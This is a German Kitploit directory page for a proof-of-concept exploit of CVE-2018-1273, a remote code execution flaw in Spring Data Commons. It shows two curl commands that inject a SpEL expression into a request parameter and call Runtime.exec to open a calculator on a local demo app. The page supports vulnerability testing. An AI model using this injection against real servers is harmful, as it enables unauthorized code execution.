Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-cve-2018-1273 — Proof-of-Concept-Exploit für CVE-2018-1273, eine Spring Data Commons Property Binder-Schwachstelle, die zu Remote-Code-Execution über manipulierte HTTP-Anfrageparameter führt. | Kitploit
Tools/GitHubGitHub/webr0ck/poc-cve-2018-1273
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubwebr0ck/poc-cve-2018-1273

poc-cve-2018-1273

Proof-of-Concept-Exploit für CVE-2018-1273, eine Spring Data Commons Property Binder-Schwachstelle, die zu Remote-Code-Execution über manipulierte HTTP-Anfrageparameter führt.

Repository anzeigen
23vor 7 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-1273

Versionen von Spring Data Commons vor 1.13, von 1.13 bis 1.13.10, von 2.0 bis 2.0.5 sowie ältere nicht unterstützte Versionen enthalten eine Schwachstelle im Property Binder, die durch unsachgemäße Neutralisierung spezieller Elemente verursacht wird. Ein nicht authentifizierter entfernter Angreifer kann speziell präparierte Anfrageparameter gegen HTTP-Ressourcen von Spring Data REST senden oder die projektionsbasierte Bindung von Anfrage-Payloads von Spring Data verwenden, was zu einem Remote-Code-Execution-Angriff führen kann.

Weitere Informationen hier

Ausführen

Die Anwendung kann mit der anfälligen Version oder der behobenen Version von Spring Data Commons getestet werden.

  • Anfällige Version (standardmäßig):
root@kitploit:~
mvn spring-boot:run
  • Behobene Version:
root@kitploit:~
mvn spring-boot:run -Dfixed

Testen der Schwachstelle

Führen Sie den folgenden Befehl aus, um zu prüfen, ob die Schwachstelle ausgenutzt werden kann:

  • Unter Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • Unter macOS:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Danksagungen

Erstellt von https://www.arima.eu

ARIMA Software Design

Tool herunterladen